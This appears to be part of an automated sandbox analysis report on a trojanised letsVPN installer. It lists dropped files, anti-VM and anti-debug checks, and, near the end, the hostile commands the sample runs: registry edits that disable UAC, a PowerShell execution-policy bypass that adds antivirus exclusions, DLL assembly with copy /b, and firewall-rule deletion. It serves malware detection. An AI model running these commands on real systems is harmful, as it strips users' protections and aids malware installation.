              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4F7.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsExec.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeAPI coverage: 0.1 %
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeAPI coverage: 6.4 %
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeAPI coverage: 7.6 %
              Source: C:\Windows\System32\svchost.exe TID: 4788Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 1708Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6648Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6644Thread sleep time: -4500000s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7752Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FEB97
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,19_2_6D0FC41C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FE748
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,19_2_6D0FC385
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D095C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,19_2_6D095C91
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDCF7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDF35
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FD86F
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDA9B
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040689E FindFirstFileW,FindClose,21_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00402930 FindFirstFileW,21_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961971EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,33_2_00007FF7961971EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00684318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,58_2_00684318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695490 FindFirstFileExW,58_2_00695490
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180006940 GetSystemInfo,GlobalMemoryStatusEx,0_2_0000000180006940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: sinaplayer_service.exe, 00000013.00000002.3389075386.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp.^l
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: svchost.exe, 00000028.00000003.2652483472.00000273EF317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension93}
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: svchost.exe, 00000028.00000003.2652358540.00000273EF322000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@vmnetextension
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes;
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
              Source: LetsPRO.exe, 0000003D.00000002.3413852578.000000000525F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dksecwoqydufhai Bus
              Source: svchost.exe, 0000000D.00000002.3392811758.0000020B52E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3395633467.0000020B58458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: netsh.exe, 0000002D.00000003.2672378207.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-18100
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-16580
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-18090
              Source: C:\ProgramData\letsvpn-latest.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\letsvpn-latest.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180016BCF __crtCaptureCurrentContext,IsDebuggerPresent,0_2_0000000180016BCF
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000DDF0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_000000018000DDF0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1208AC VirtualProtect ?,-00000001,00000104,?,?,?,0000001C19_2_6D1208AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695217 mov eax, dword ptr fs:[00000030h]58_2_00695217
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068EDE2 mov eax, dword ptr fs:[00000030h]58_2_0068EDE2
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800278D5 _errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,0_2_00000001800278D5
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A280 ExitThread,SetUnhandledExceptionFilter,0_2_000000018002A280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2A0 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,0_2_000000018002A2A0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2C8 RtlCaptureContext,SetUnhandledExceptionFilter,0_2_000000018002A2C8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2E0 SetUnhandledExceptionFilter,0_2_000000018002A2E0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180027F26 IsProcessorFeaturePresent,IsProcessorFeaturePresent,SetUnhandledExceptionFilter,0_2_0000000180027F26
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00537D98 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,19_2_00537D98
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D12480C __crtUnhandledException,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6D12480C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0AC7DB __crtSetUnhandledExceptionFilter,SetUnhandledExceptionFilter,19_2_6D0AC7DB
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796197680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00007FF796197680
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796197798 SetUnhandledExceptionFilter,33_2_00007FF796197798
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00688A28
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0068DAD2
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00688E32
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688FC5 SetUnhandledExceptionFilter,58_2_00688FC5
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xmlJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat" Jump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe" Jump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe" Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
